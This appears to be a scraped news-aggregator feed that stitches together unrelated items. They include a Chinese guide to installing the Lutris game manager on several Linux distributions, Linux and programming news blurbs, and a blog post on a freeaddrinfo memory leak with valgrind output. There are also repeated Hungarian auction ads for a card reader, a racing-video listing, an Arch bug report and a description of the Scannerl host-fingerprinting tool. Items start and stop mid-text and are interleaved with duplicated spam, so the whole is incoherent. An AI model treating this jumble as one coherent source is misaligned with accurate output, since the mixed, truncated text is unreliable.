  • Nintendo NES、SNES、Game Boy、Game Boy Advance、DS
  • Game Cube 和 Wii
  • Sega Master Sytem、Game Gear、Genesis、Dreamcast
  • SNK Neo Geo、Neo Geo Pocket
  • Sony PlayStation
  • Sony PlayStation 2
  • Sony PSP
  • 像 Zork 这样的 Z-Machine 游戏
  • 还有更多

安装 Lutris

就像 Steam 一样,Lutries 包含两部分:网站和客户端程序。从网站你可以浏览可用的游戏,添加最喜欢的游戏到个人库,以及使用安装链接安装他们。

首先,我们还是来安装客户端。它目前支持 Arch Linux、Debian、Fedroa、Gentoo、openSUSE 和 Ubuntu。

对于 Arch Linux 和它的衍生版本,像是 Antergos, Manjaro Linux,都可以在 AUR 中找到。因此,你可以使用 AUR 帮助程序安装它。

使用 Pacaur

pacaur -S lutris

使用 Packer

packer -S lutris

使用 Yaourt

yaourt -S lutris

使用 Yay

yay -S lutris

Debian:

Debian 9.0 上以 root 身份运行以下命令:

echo 'deb http://download.opensuse.org/repositories/home:/strycore/Debian_9.0/ /' > /etc/apt/sources.list.d/lutris.list
wget -nv https://download.opensuse.org/repositories/home:strycore/Debian_9.0/Release.key -O Release.key
apt-key add - < Release.key
apt-get update
apt-get install lutris

Debian 8.0 上以 root 身份运行以下命令:

echo 'deb http://download.opensuse.org/repositories/home:/strycore/Debian_8.0/ /' > /etc/apt/sources.list.d/lutris.list
wget -nv https://download.opensuse.org/repositories/home:strycore/Debian_8.0/Release.key -O Release.key
apt-key add - < Release.key
apt-get update
apt-get install lutris

Fedora 27 上以 root 身份运行以下命令:

dnf config-manager --add-repo https://download.opensuse.org/repositories/home:strycore/Fedora_27/home:strycore.repo
dnf install lutris

Fedora 26 上以 root 身份运行以下命令:

dnf config-manager --add-repo https://download.opensuse.org/repositories/home:strycore/Fedora_26/home:strycore.repo
dnf install lutris

openSUSE Tumbleweed 上以 root 身份运行以下命令:

zypper addrepo https://download.opensuse.org/repositories/home:strycore/openSUSE_Tumbleweed/home:strycore.repo
zypper refresh
zypper install lutris

openSUSE Leap 42.3 上以 root 身份运行以下命令:

zypper addrepo https://download.opensuse.org/repositories/home:strycore/openSUSE_Leap_42.3/home:strycore.repo
zypper refresh
zypper install lutris

Ubuntu 17.10

sudo sh -c "echo 'deb http://download.opensuse.org/repositories/home:/strycore/xUbuntu_17.10/ /' > /etc/apt/sources.list.d/lutris.list"
wget -nv https://download.opensuse.org/repositories/home:strycore/xUbuntu_17.10/Release.key -O Release.key
sudo apt-key add - < Release.key
sudo apt-get update
sudo apt-get install lutris

Ubuntu 17.04

sudo sh -c "echo 'deb http://download.opensuse.org/repositories/home:/strycore/xUbuntu_17.04/ /' > /etc/apt/sources.list.d/lutris.list"
wget -nv https://download.opensuse.org/repositories/home:strycore/xUbuntu_17.04/Release.key -O Release.key
sudo apt-key add - < Release.key
sudo apt-get update
sudo apt-get install lutris

Ubuntu 16.10

sudo sh -c "echo 'deb http://download.opensuse.org/repositories/home:/strycore/xUbuntu_16.10/ /' > /etc/apt/sources.list.d/lutris.list"
wget -nv https://download.opensuse.org/repositories/home:strycore/xUbuntu_16.10/Release.key -O Release.key
sudo apt-key add - < Release.key
sudo apt-get update
sudo apt-get install lutris

Ubuntu 16.04

sudo sh -c "echo 'deb http://download.opensuse.org/repositories/home:/strycore/xUbuntu_16.04/ /' > /etc/apt/sources.list.d/lutris.list"
wget -nv https://download.opensuse.org/repositories/home:strycore/xUbuntu_16.04/Release.key -O Release.key
sudo apt-key add - < Release.key
sudo apt-get update
sudo apt-get install lutris

对于其他平台,参考 Lutris 下载链接

使用 Lutris 管理你的游戏

安装完成后,从菜单或者应用启动器里打开 Lutries。首次启动时,Lutries 的默认界面像下面这样:

登录你的 Lutris.net 账号

为了能同步你个人库中的游戏,下一步你需要在客户端中登录你的 Lutris.net 账号。如果你没有,先 注册一个新的账号。然后点击 “Connecting to your Lutirs.net account to sync your library” 连接到 Lutries 客户端。

输入你的账号信息然后点击 “Connect”。

现在你已经连接到你的 Lutries.net 账号了。

浏览游戏

点击工具栏里的浏览图标(游戏控制器图标)可以搜索任何游戏。它会自动定向到 Lutries 网站的游戏页。你可以以字母顺序查看所有可用的游戏。Lutries 现在已经有了很多游戏,而且还有更多的不断添加进来。

任选一个游戏,添加到你的库中。

然后返回到你的 Lutries 客户端,点击 “Menu -> Lutris -> Synchronize library”。现在你可以在本地的 Lutries 客户端中看到所有在库中的游戏了。

如果你没有看到游戏,只需要重启一次。

安装游戏

安装游戏,只需要点击游戏,然后点击 “Install” 按钮。例如,我想在我的系统安装 2048,就像你在底下的截图中看到的,它要求我选择一个版本去安装。因为它只有一个版本(例如,在线),它就会自动选择这个版本。点击 “Continue”。

点击“Install”:

安装完成之后,你可以启动新安装的游戏或是关闭这个窗口,继续从你的库中安装其他游戏。

导入 Steam 库

你也可以导入你的 Steam 库。在你的头像处点击 “Sign in through Steam” 按钮。接下来你将被重定向到 Steam,输入你的账号信息。填写正确后,你的 Steam 账号将被连接到 Lutries 账号。请注意,为了同步库中的游戏,这里你的 Steam 账号将被公开。你可以在同步完成之后将其重新设为私密状态。

手动添加游戏

Lutries 有手动添加游戏的选项。在工具栏中点击 “+” 号登录。

在下一个窗口,输入游戏名,在游戏信息栏选择一个运行器。运行器是指 Linux 上类似 wine、Steam 之类的程序,它们可以帮助你启动这个游戏。你可以从 “Menu -> Manage” 中安装运行器。

然后在下一栏中选择可执行文件或者 ISO。最后点击保存。有一个好消息是,你可以添加一个游戏的多个版本。

移除游戏

移除任何已安装的游戏,只需在 Lutries 客户端的本地库中点击对应的游戏。选择 “Remove” 然后 “Apply”。

Lutries 就像 Steam。只是从网站向你的库中添加游戏,并在客户端中为你安装它们。

各位,这就是今天所有的内容了。我们将会在今年发表更多好的和有用的文章。敬请关注!

干杯!

:)


via: https://www.ostechnix.com/manage-games-using-lutris-linux/

作者:SK 译者:dianbanjiu 校对:wxy

本文由 LCTT 原创编译,Linux中国 荣誉推出


          Programming News      Cache   Translate Page      
  • Open Source Survey Shows Python Love, Security Pain Points

    ActiveState published results of a survey conducted to examine challenges faced by developers who work with open source runtimes, revealing love for Python and security pain points.

  • Study Finds Lukewarm Corporate Engagement With Open Source

    Companies expect developers to use open source tools at work, but few make substantial contributions in return

    Developers say that nearly three-quarters of their employers expect them to use open source software to do their jobs, but that those same companies’ contribution to the open source world is relatively low, with only 25 percent contributing more than $1,000 (£768) a year to open source projects.

    Only a small number of employers, 18 percent, contribute to open source foundations, and only 34 percent allow developers to use company time to make open source contributions, according to a new study.

    The study follows IBM’s announcement last week that it plans to buy Linux maker Red Hat for $34 billion (£26m) in order to revitalise its growth in the cloud market, an indication of the importance of open source in the booming cloud industry.

    The report by cloud technology provider DigitalOcean, based on responses from more than 4,300 developers around the world, is the company’s fifth quarterly study on developer trends, with this edition focusing entirely on open source.

  • On learning Go and a comparison with Rust

    I spoke at the AKL Rust Meetup last month (slides) about my side project doing data mining in Rust. There were a number of engineers from Movio there who use Go, and I've been keen for a while to learn Go and compare it with Rust and Python for my data mining side projects, so that inspired me to knuckle down and learn Go.

    Go is super simple. I was able to learn the important points in a couple of evenings by reading GoByExample, and I very quickly had an implementation of the FPGrowth algorithm in Go up and running. For reference, I also have implementations of FPGrowth in Rust, Python, Java and C++.

  • anytime 0.3.2

    A new minor release of the anytime package arrived on CRAN this morning. This is the thirteenth release, and the first since July as the package has gotten feature-complete.

    anytime is a very focused package aiming to do just one thing really well: to convert anything in integer, numeric, character, factor, ordered, … format to either POSIXct or Date objects – and to do so without requiring a format string. See the anytime page, or the GitHub README.md for a few examples.

read more


          Linux IoT Landscape: Distributions      Cache   Translate Page      

Linux is an Operating System, which is the program at the heart of controlling a computer. It decides how to partition the available resources (CPU, memory, disk, network) between all of the other programs vying for it. The operating system, while very important, isn’t useful on its own. Its purpose is to manage the compute resources for other programs. Without these other programs, the Operating System doesn’t serve much of a purpose.

That’s where the distribution comes in. A distribution provides a large number of other programs that, together with Linux, can be assembled into working sets for a vast number of purposes. These programs can range from basic program writing tools such as compilers and linkers to communications libraries to spreadsheets and editors to pretty much everything in between. A distribution tends to have a superset of what’s actually used for each individual computer or solution. It also provides many choices for each category of software components that users or companies can assemble into what they consider a working set. A rough analogy can be made to a supermarket in which there are many options for many items on the shelves, and each user picks and chooses what makes sense to them in their cart.

Read more

read more


          Leaving Windows Behind      Cache   Translate Page      
  • Buh-bye Windows, hello Linux!

    So far I'm already becoming a Linux fan at least when it comes to servers. Running a box without any graphical user interface is in some ways easier.
    Everything is a file and everything you can do can be done with a command.
    On Windows most things you do when managing a server consist of a complex series of clicking this and that button or file icon, filling out textfields etc. etc. and is hard to document (I'm sure you can also do most things with CMD and Powershell of course)
    On Linux it might take some time to research how to do even the simplest thing for a newbie such as myself, but every command needed can simply be stored in a text-file, so that I can easily set up a new server from scratch.

  • Outlook 365 and iCloud Calendar Continue to Have Sync Issues after Winter Time Change

    There seem to be recurring issues in syncing of appointments between Outlook 365 and iCloud Calendar, Borncity reports. According to them, the dates between the calendars were shifted by one hour. Gunter Born wrote that Volker G. (a blog reader) wrote to him regarding the problems with calendar synchronization between Outlook 365 and iCloud calendar. He complained that since the hourly shift, the times of some of his appointments are no longer correct. Several other users are also complaining likewise.

  • Windows 10 Still Won’t Let You Use These File Names Reserved in 1974

    Windows “reserves” certain file names and doesn’t let you use them anywhere. Forget calling a file “con.txt” or “aux.mp3”. This is all because of a choice made in 1974 and Microsoft’s thirst for eternal backwards compatibility.

read more


          IBM/Red Hat Latest      Cache   Translate Page      

read more


          Games: Lamplight City, Epicinium, Egypt: Old Kingdom and DXVK News      Cache   Translate Page      
  • Game Review: Lamplight City

    The universe of Lamplight City is rich, complex and oddly familiar. The game draws on that ever-popular theme of a steampunk alternative universe, adding dashes of Victorian squalor and just a pinch of 1950's detective tropes. Is it just a mishmash of clichés then? Yes, but it all works well together to form a likable and somewhat unique universe—like a cheesy movie, you can't help but fall in love with Lamplight City.

  • Epicinium, a turn-based strategy game where nature is a finite resource is now on Kickstarter

    Epicinium from developer A Bunch of Hacks has hit Kickstarter. It's an interesting strategy game, one where nature is a finite resource you must try to not destroy during your war. Your score will depend on how much is actually left when the dust settles, so it's an interesting take on the genre.

  • Strategy game Egypt: Old Kingdom is now available DRM free on GOG
  • Vulkan Getting Another Extension To Help With DXVK/Direct3D Performance

    Last month Vulkan picked up an unofficial Vulkan transform feedback extension solely to help out efforts like DXVK that map Direct3D or other graphics APIs on top of Vulkan. Separately, another Vulkan extension is in the works to also help out DXVK and D3D-over-Vulkan-like use-cases and can assist in better performance.

read more


          RK3399 based Raspberry Pi clone will launch at $49 — or even lower      Cache   Translate Page      

Radxa has posted specs for a $49 and up, community backed “Rock Pi” Raspberry Pi lookalike with a Rockchip RK3399, USB 3.0, M.2, HDMI 2.0, and native GbE, plus optional WiFi, BT, and PoE.

Radxa is prepping a Rockchip RK3399-based Raspberry Pi pseudo clone called the Rock Pi. It joins the RK3399-based NanoPi M4 in closely matching the RPi 3 layout, and it appears it may be the most affordable RK3399 based SBC yet, starting at $49 with 2GB RAM, and possibly lower for the unpriced 1GB model.

Read more

read more


          Univerzális memória-kártya olvasó 1 Ft NMÁ!!!!!!!! - Jelenlegi ára: 1 Ft      Cache   Translate Page      
Univerzális USB 2. 0 Memória kártya-olvasó
480 Mb/s sebesség
Kompatibilis: USB 1. 1 és 2. 0
4 kártya foglalat
Támogatott kártya típusok: Micro MS/ M2/ SD/ MMC/ SDHC/DV/MS DUO/ MS PRO DUO/ Micro SD/T-Flash
Kompatibilis operációs rendszerek: Windows 7/VISTA/XP/2000/ME/98SE/98, Mac OS X 9. 0 és Linux 2. 4 vagy újabb verziói
Vékony kialakítás, kompakt méret
Plug & Play: behelyezés után egyből működik
Támogatott kártyaméret: max 32 Gb
Anyaga: műanyag
Méret: 66 x 21 x 16 mm
Súly: 14 g
Szín: véletlenszerű
A termékek külföldről érkeznek, emiatt a szállítási idő 15-30 munkanap, kérem mindenki ennek tudatában licitáljon!
Univerzális memória-kártya olvasó 1 Ft NMÁ!!!!!!!!
Jelenlegi ára: 1 Ft
Az aukció vége: 2018-11-07 07:11
          Software Engineer - Java      Cache   Translate Page      
Parvana - Cape Town, Western Cape - . Develop, test and document solutions which adhere to best practices and that fit into the existing framework. Develop new software. Education.... Linux. Experience in Jasper Reports. Exposure to the full software life cycle. Use of bug tracking systems. Proven experience of meeting...
          Univerzális memória-kártya olvasó 1 Ft NMÁ!!!!!!!! - Jelenlegi ára: 1 Ft      Cache   Translate Page      
Univerzális USB 2. 0 Memória kártya-olvasó
480 Mb/s sebesség
Kompatibilis: USB 1. 1 és 2. 0
4 kártya foglalat
Támogatott kártya típusok: Micro MS/ M2/ SD/ MMC/ SDHC/DV/MS DUO/ MS PRO DUO/ Micro SD/T-Flash
Kompatibilis operációs rendszerek: Windows 7/VISTA/XP/2000/ME/98SE/98, Mac OS X 9. 0 és Linux 2. 4 vagy újabb verziói
Vékony kialakítás, kompakt méret
Plug & Play: behelyezés után egyből működik
Támogatott kártyaméret: max 32 Gb
Anyaga: műanyag
Méret: 66 x 21 x 16 mm
Súly: 14 g
Szín: véletlenszerű
A termékek külföldről érkeznek, emiatt a szállítási idő 15-30 munkanap, kérem mindenki ennek tudatában licitáljon!
Univerzális memória-kártya olvasó 1 Ft NMÁ!!!!!!!!
Jelenlegi ára: 1 Ft
Az aukció vége: 2018-11-07 07:11
          Univerzális memória-kártya olvasó 1 Ft NMÁ!!!!!!!! - Jelenlegi ára: 1 Ft      Cache   Translate Page      
Univerzális USB 2. 0 Memória kártya-olvasó
480 Mb/s sebesség
Kompatibilis: USB 1. 1 és 2. 0
4 kártya foglalat
Támogatott kártya típusok: Micro MS/ M2/ SD/ MMC/ SDHC/DV/MS DUO/ MS PRO DUO/ Micro SD/T-Flash
Kompatibilis operációs rendszerek: Windows 7/VISTA/XP/2000/ME/98SE/98, Mac OS X 9. 0 és Linux 2. 4 vagy újabb verziói
Vékony kialakítás, kompakt méret
Plug & Play: behelyezés után egyből működik
Támogatott kártyaméret: max 32 Gb
Anyaga: műanyag
Méret: 66 x 21 x 16 mm
Súly: 14 g
Szín: véletlenszerű
A termékek külföldről érkeznek, emiatt a szállítási idő 15-30 munkanap, kérem mindenki ennek tudatában licitáljon!
Univerzális memória-kártya olvasó 1 Ft NMÁ!!!!!!!!
Jelenlegi ára: 1 Ft
Az aukció vége: 2018-11-07 07:11
          How do I install JLime: Linux on HP Jornada 720?      Cache   Translate Page      
Excuse the category but I did not know where to post, please admins and moderators to correct me.

I have a HP Jornada 720, from 8 years ago and I saw that it is possible to install Linux on it.
I saw this in this video: Jlime: Linux On Your HP Jornada
I know you need a CF card (Compact Flash) and 3 applications to download from the internet.
How is this possible? How do I make a bootable CF card?
I would like to leave me a tutorial to follow step by step.
Many thanks in advance for the answers!
          Programmer Analyst - University of Wyoming Family Medicine Residency Program - Laramie, WY      Cache   Translate Page      
Javascript, NodeJS, PL/SQL and similar languages. Familiarity with Linux environment, javascript libraries, XML, JSON and SOAP or REST calls to web services.... $42,228 a year
From University of Wyoming Family Medicine Residency Program - Tue, 30 Oct 2018 18:54:17 GMT - View all Laramie, WY jobs
          Banner Developer - ITS - Careers | West Virginia University - Morgantown, WV      Cache   Translate Page      
This person will provide assist Senior Developers with application development support in an Oracle/Linux environment in SQL*PLUS, PL/SQL, SQL*Loader, Pro*C,...
From West Virginia University - Sun, 04 Nov 2018 10:05:52 GMT - View all Morgantown, WV jobs
          Senior Computer Security System Specialist - Attain, LLC - Morgantown, WV      Cache   Translate Page      
Experience in providing security solutions for desktops, laptops, mobile devices (IPHONES , Android, Tablets) and for enterprise servers (Linux, Unix, Windows,...
From Attain, LLC - Wed, 03 Oct 2018 19:41:39 GMT - View all Morgantown, WV jobs
          Assert yourself      Cache   Translate Page      

Defensive programming is often touted as a better coding style, but it hides bugs. Remember, the errors we're talking about should never happen, and by safely handling them, you make it harder to write bug-free code.

… you don't want to hide bugs by programming defensively …

… No matter where you employ the defensive style, ask youself, “Am I hiding bugs in this code by using defensive programming?” If you might be, add some assertions to alert you to those bugs.

Writing Solid Code

Writing Solid Code is the rare book that forced me to change how I go about programming. I feel I'm in the minority, but after reading that book, I hate defensive programming. Don't get me wrong—at the input/output boundary, you need to be absolutely paranoid about checking data, but among functions? Not so paranoid.

And now class, story time …

Project: Cleese” was installed onto the QA system the other day, and by chance today, I noticed a core file produced by said program. This was odd, since both I and T (the QA engineer assigned to our team) had tested the program without incident.

I was able to isolate the crash to freeaddrinfo(), a function used to release memory used by getaddrinfo() when converting a domain name like “boston.conman.org” to an IP address. A summary of the code in question:

struct addrinfo  hints;
struct addrinfo *results;
const char      *hostname;
const char      *port;
int              rc;

memset(&hints,0,sizeof(hints));

results  = NULL;
hostname = ... ;
port     = ... ;

// code code ;

rc = getaddrinfo(hostname,port,&hints,&results);

// code code

for ( ; results != NULL ; results = results->ai_next)
{
  if (results->ai_protocol == protocol)
  {
    // code code
  }
}

freeaddrinfo(results);

It's a rookie mistake but hey, it happens. The issue is that results is linked list of results, which is traversed. By the time freeaddrinfo() is called, results is now NULL. Under Linux and Mac OS-X, it seems that freeaddrinfo() checks if it's given a NULL pointer and … just does nothing if it is. It doesn't crash, but it does leak memory (it's not much in this case, since this function is only called once upon startup, but a leak is still a leak). Linux and Mac OS-X use defensive programming, probably something along the lines of:

void freeaddrinfo(struct addrinfo *info)
{
  if (info == NULL)
    return;
  // code code code 
}

which hid a bug. Solaris (which we have to use for reasons) is not so forgiving and immedately crashed.

So on Linux and Mac OS-X, how would one even test for this type of issue? The code doesn't crash. It returns results. Yes, valgrind can easily find it:

[spc]lucy:/tmp>valgrind --leak-check=full --show-reachable=yes `which lua` x.lua
==31304== Memcheck, a memory error detector.
==31304== Copyright (C) 2002-2005, and GNU GPL'd, by Julian Seward et al.
==31304== Using LibVEX rev 1575, a library for dynamic binary translation.
==31304== Copyright (C) 2004-2005, and GNU GPL'd, by OpenWorks LLP.
==31304== Using valgrind-3.1.1, a dynamic binary instrumentation framework.
==31304== Copyright (C) 2000-2005, and GNU GPL'd, by Julian Seward et al.
==31304== For more details, rerun with: -v
==31304== 
==31304== 
==31304== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 25 from 2)
==31304== malloc/free: in use at exit: 48 bytes in 1 blocks.
==31304== malloc/free: 521 allocs, 520 frees, 43,016 bytes allocated.
==31304== For counts of detected errors, rerun with: -v
==31304== searching for pointers to 1 not-freed blocks.
==31304== checked 117,892 bytes.
==31304== 
==31304== 48 bytes in 1 blocks are definitely lost in loss record 1 of 1
==31304==    at 0x4004405: malloc (vg_replace_malloc.c:149)
==31304==    by 0xC40B5D: gaih_inet (in /lib/tls/libc-2.3.4.so)
==31304==    by 0xC445DC: getaddrinfo (in /lib/tls/libc-2.3.4.so)
==31304==    by 0x400A5FA: ???
==31304==    by 0x804EF69: luaD_precall (in /usr/local/bin/lua)
==31304==    by 0x80589E0: luaV_execute (in /usr/local/bin/lua)
==31304==    by 0x804F27C: luaD_call (in /usr/local/bin/lua)
==31304==    by 0x804F2BD: luaD_callnoyield (in /usr/local/bin/lua)
==31304==    by 0x804D145: f_call (in /usr/local/bin/lua)
==31304==    by 0x804E8AB: luaD_rawrunprotected (in /usr/local/bin/lua)
==31304==    by 0x804F6EB: luaD_pcall (in /usr/local/bin/lua)
==31304==    by 0x804D1A7: lua_pcallk (in /usr/local/bin/lua)
==31304== 
==31304== LEAK SUMMARY:
==31304==    definitely lost: 48 bytes in 1 blocks.
==31304==      possibly lost: 0 bytes in 0 blocks.
==31304==    still reachable: 0 bytes in 0 blocks.
==31304==         suppressed: 0 bytes in 0 blocks.
[spc]lucy:/tmp>

but given that “Project: Cleese” is written in Lua, a garbage collected language, memory leaks weren't foremost in the mind when testing. Had freeaddrinfo() on Linux (and Mac OS-X) not been so forgiving (or defensive) then this bug would most likely have been found immediately, and not hidden in the codebase for over five years! (I checked the history of the code in question—it had been there a long time—way before “Project: Cleese” was even started)

It is because of bugs like this that I am not a fan of defensive programming. They can hide. They can fester. They can be a nightmare to debug at 3:00 am on a production system sans a debugger.


          H Zeng对《对 Linux 用户友好的银行》的评论      Cache   Translate Page      
你这个评论真是够长的......这些事情我也不太明白。
          Senior Software Engineer - Security and Platform Distribution - Cray - Bloomington, MN      Cache   Translate Page      
Our business is supercomputing. We are seeking an engineer in Cray R&amp;D who is responsible for the distributions of Linux used in Cray Products and for security...
From Cray - Tue, 30 Oct 2018 20:18:46 GMT - View all Bloomington, MN jobs
          LXer: Linux znew Command Tutorial for Beginners (with Examples)      Cache   Translate Page      
Published at LXer: Did you know Linux offers a way to recompress .Z files to .gz files? Yes, the znew command lets you do this. In this tutorial, we will discuss the basics of this command line...
          LXer: Red Hat - How An Open Source Software Company Became 34,000 Million Dollars Company      Cache   Translate Page      
Published at LXer: In a historic milestone, Red Hat, the company that triumphed with Linux and open source has been acquired by IBM for 34,000 million dollars, the largest transaction in history...
          Hello new to Linux and Linux Questions.org      Cache   Translate Page      
I'm new to linux and linux questions. I'm using Tutor Linux videos on youtube and code academy to learn linux. Going pretty well. Join this website to learn more and how to ask questions.
          LXer: Wonderwall: Cool Wallpaper Program For Linux      Cache   Translate Page      
Published at LXer: Wonderwall is a snap app cool wallpaper program for Unity and GNOME Desktop Environment. Its simplistic user interface allows the user to easily browse, download and install...
          Microsoft Adds Linux Perks to Windows 10 October 2018 Update      Cache   Translate Page      
Microsoft is adding more perks to its beleaguered Windows 10 October 2018 Update (also known as version 1809), which is still suspended after a botched Oct. 2 release.
          Univerzális memória-kártya olvasó 1 Ft NMÁ!!!!!!!! - Jelenlegi ára: 1 Ft      Cache   Translate Page      
Univerzális USB 2. 0 Memória kártya-olvasó
480 Mb/s sebesség
Kompatibilis: USB 1. 1 és 2. 0
4 kártya foglalat
Támogatott kártya típusok: Micro MS/ M2/ SD/ MMC/ SDHC/DV/MS DUO/ MS PRO DUO/ Micro SD/T-Flash
Kompatibilis operációs rendszerek: Windows 7/VISTA/XP/2000/ME/98SE/98, Mac OS X 9. 0 és Linux 2. 4 vagy újabb verziói
Vékony kialakítás, kompakt méret
Plug & Play: behelyezés után egyből működik
Támogatott kártyaméret: max 32 Gb
Anyaga: műanyag
Méret: 66 x 21 x 16 mm
Súly: 14 g
Szín: véletlenszerű
A termékek külföldről érkeznek, emiatt a szállítási idő 15-30 munkanap, kérem mindenki ennek tudatában licitáljon!
Univerzális memória-kártya olvasó 1 Ft NMÁ!!!!!!!!
Jelenlegi ára: 1 Ft
Az aukció vége: 2018-11-07 20:35
          2018 Australian V8 SuperCars, the ITM Auckland SuperSprint - Race 29 in 1080p (V8)      Cache   Translate Page      
2018 Australian V8 SuperCars, the ITM Auckland SuperSprint - Race 29 from Pukekohe Park Raceway - Pukekohe, New Zealand in Full HD 1080p format. File Type: MP4 File Size: 6.7 Gb Spoken Language: Australian English Subtitles: None Video Codec: H264 - MPEG-4 High Profile 5.1 Resolution: 1920 x 1080 px Frame Rate: 50 fps Bitrate: VBR 8000 kbps Audio Codec: MPEG AAC Audio(mp4a) Channels: Stereo Sample Rate: 48000 Hz Bitrate: CBR 192 kbps Run Time: Approx. 1h:58m Air Date: 04-11-18 Comments: Full HD 1080p (superb quality) races uncut coverage,(no commercials): about 20 min. pre-race; warm-up lap; race; interviews; podium. Race 29 Full Footage (70 laps) Recorded from DVB-C/S Linux receiver, reencoded from TS to MP4 file, you need a powerful mediaplayer and fast network for smooth play. P.S. Thanks to my good friend HennyBill for providing the file and info, he will try to deliver for me all races in 1080p, i will seed. Please PM me for other smaller files, thank you!!
          sysget – A Front-end for Every Package Manager in Linux      Cache   Translate Page      
Linux comes in many flavors and many of us like to test all kind of distributions until we find the perfect match for our needs. The problem is that based on which major distribution...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]

          Of course you can boot Linux on new Macs – here’s how      Cache   Translate Page      
Yes, you can in fact boot Linux on the latest Macs...
          H Zeng对《对 Linux 用户友好的银行》的评论      Cache   Translate Page      
你这个评论真是够长的......这些事情我也不太明白。
          #150 El chip de seguridad T2 de Apple impide instalar Linux en los nuevos Mac [ENG]      Cache   Translate Page      

#68 Esto es más bien como si Mercedes te impidiese usar gasolina que no fuese de su propia marca. Pero te has currado el hombre de paja, sí.

» autor: el_chino_ese_de_corea


          #149 El chip de seguridad T2 de Apple impide instalar Linux en los nuevos Mac [ENG]      Cache   Translate Page      

#11 Sí, haciendo en su día guiños a propaganda anti-comunista como 1984 y comportándose en la actualidad como capitalistas. La verdad es que no han cambiado nada, el problema es que os colasen su propaganda """transgresora""".

» autor: el_chino_ese_de_corea


          Booting Linux On New Apple Hardware      Cache   Translate Page      
I ran across articles that point to the fact that Apple (with new hardware) is making it difficult to boot into Linux. This would seem to be a perpetuation of Microsoft and Apple attempting to "elbow"...
          元Juniperの技術者が創業したVolterraはエッジを統合するファブリックサービス構築を目指す      Cache   Translate Page      
Juniper NetworksのSoftware-Defined Network(SDN)として知られているContrailは、元々JuniperがContrail Systemsを買収した2012年以降、Juniperのソフトウェアベースのコントローラーとしてブランディングされていた。そこからOpenContrailとしてオープンソースソフトウェア化され、最終的にTungsten Fabricと名称を変え、Linux Foundationにホストされることとなった。 そのContrailの元々の開発を行っていたContrail Systemsの創業者&CEOであったAnkur Singla氏が、Juniperの後に創業したのがVolterraだ。すでにKhosla VentureやMicrosoftが出資を行い、ラウンドAで$25Mの投資を集めた実績からわかるように、シリコンバレーでは注目のベンチャー企業だ。
          Otázka - Linux session jen prohlížeč - existuje? (Počítače a příslušenství)      Cache   Translate Page      
vojtisekitrm: Ahoj,Už jsem chvilku googlil a zatím jsem na nic nenarazil. Chtěl bych se zeptat jestli náhodou neznáte nějakou Linux session která se skládá jen z prohlížeč(:odkaz:) nepředstavitelné ale vysvětlí(:odkaz:) něco jako Java Applet (:odkaz:)čítač který po spuštění a loginu místo pozadí a různých nabídek spustí jen prohlížeč přes fulscreen.(Pro zájemce je to stroj "Sun JavaStation" z roku (diskuze na internetové stránce)
          Details - Radical Minds Technologies - Job, WV      Cache   Translate Page      
Linux/Unix server installation, configuration. Linux/Unix Administration and Troubleshooting. VMware Administration virtualization techniques or any other...
From Radical Minds Technologies - Mon, 17 Sep 2018 10:32:29 GMT - View all Job, WV jobs
          FS#60702: Unable to Install Apper: PackageKit Owned by GNOME      Cache   Translate Page      
Summary and Info:

I've been testing GUIs for Pacman and encountered an issue with not being able to install Apper. I'm doing this from command line.

[root@REDACTED pacman.d]# pacman -S apper
resolving dependencies...
looking for conflicting packages...

Packages (5) kcmutils-5.51.0-1 kdeclarative-5.51.0-1 kpackage-5.51.0-1 packagekit-qt5-1.0.1-1
apper-1.0.0-1

Total Installed Size: 8.87 MiB

:: Proceed with installation? [Y/n] y
(5/5) checking keys in keyring [################################] 100%
(5/5) checking package integrity [################################] 100%
(5/5) loading package files [################################] 100%
(5/5) checking for file conflicts [################################] 100%
error: failed to commit transaction (conflicting files)
apper: /usr/share/dbus-1/services/org.freedesktop.PackageKit.service exists in filesystem (owned by gnome-software)
Errors occurred, no packages were upgraded.
[root@REDACTED pacman.d]# pacman -Qo /usr/share/dbus-1/services/org.freedesktop.PackageKit.service
/usr/share/dbus-1/services/org.freedesktop.PackageKit.service is owned by gnome-software 3.30.5-1


Following the instructions here: https://wiki.archlinux.org/index.php/Pacman#Repositories_and_mirrors, I'm reporting the bug as requested.


Steps to Reproduce:

1. Install GNOME with Pacman
2. Install gnome-software and gnome-packagekit
3. Attempt to install Apper with Pacman
          Libxkbcommon, OpenSSH, ppp, SpamAssassin Updates for Ubuntu      Cache   Translate Page      
The following updates has been released for Ubuntu Linux: USN-3786-2: libxkbcommon vulnerabilities USN-3809-1: OpenSSH vulnerabilities USN-3810-1: ppp vulnerability USN-3811-1: SpamAssassin vulnerabilities...
          24 Oracle Linux Updates      Cache   Translate Page      
The following updates has been released for Oracle Linux: ELBA-2018-3339 Oracle Linux 7 libvirt bug fix update ELSA-2018-3032 Low: Oracle Linux 7 binutils security, bug fix, and enhancement update ELSA-2018-3041 Moderate: Oracle Linux 7 python security and bug fix update ELSA-2018-3050 Moderate: Oracle Linux 7 gnutls security, bug fix, and enhancement update ELSA-2018-3052 Moderate: Oracle Linux 7 wget security and bug fix update ELSA-2018-3056 Moderate: Oracle Linux 7 samba security, bug fix, and enhancement update ELSA-2018-3065 Mode...
          Readerware for Linux 4.2      Cache   Translate Page      
The easiest, fastest way to catalog your books, music and videos. Nothing else comes close. Have a large collection? The unique auto-catalog feature lets you feed in a list of ISBNs, LCCNs, UPCs or barcode scans.
          Scannerl - The Modular Distributed Fingerprinting Engine      Cache   Translate Page      

Scannerl is a modular distributed fingerprinting engine implemented by Kudelski Security. Scannerl can fingerprint thousands of targets on a single host, but can just as easily be distributed across multiple hosts. Scannerl is to fingerprinting what zmap is to port scanning.
Scannerl works on Debian/Ubuntu/Arch (but will probably work on other distributions as well). It uses a master/slave architecture where the master node will distribute the work (host(s) to fingerprint) to its slaves (local or remote). The entire deployment is transparent to the user.

Why use Scannerl
When using conventional fingerprinting tools for large-scale analysis, security researchers will often hit two limitations: first, these tools are typically built for scanning comparatively few hosts at a time and are inappropriate for large ranges of IP addresses. Second, if large range of IP addresses protected by IPS devices are being fingerprinted, the probability of being blacklisted is higher what could lead to an incomplete set of information. Scannerl is designed to circumvent these limitations, not only by providing the ability to fingerprint multiple hosts simultaneously, but also by distributing the load across an arbitrary number of hosts. Scannerl also makes the distribution of these tasks completely transparent, which makes setup and maintenance of large-scale fingerprinting projects trivial; this allows to focus on the analyses rather than the herculean task of managing and distributing fingerprinting processes by hand. In addition to the speed factor, scannerl has been designed to allow to easily set up specific fingerprinting analyses in a few lines of code. Not only is the creation of a 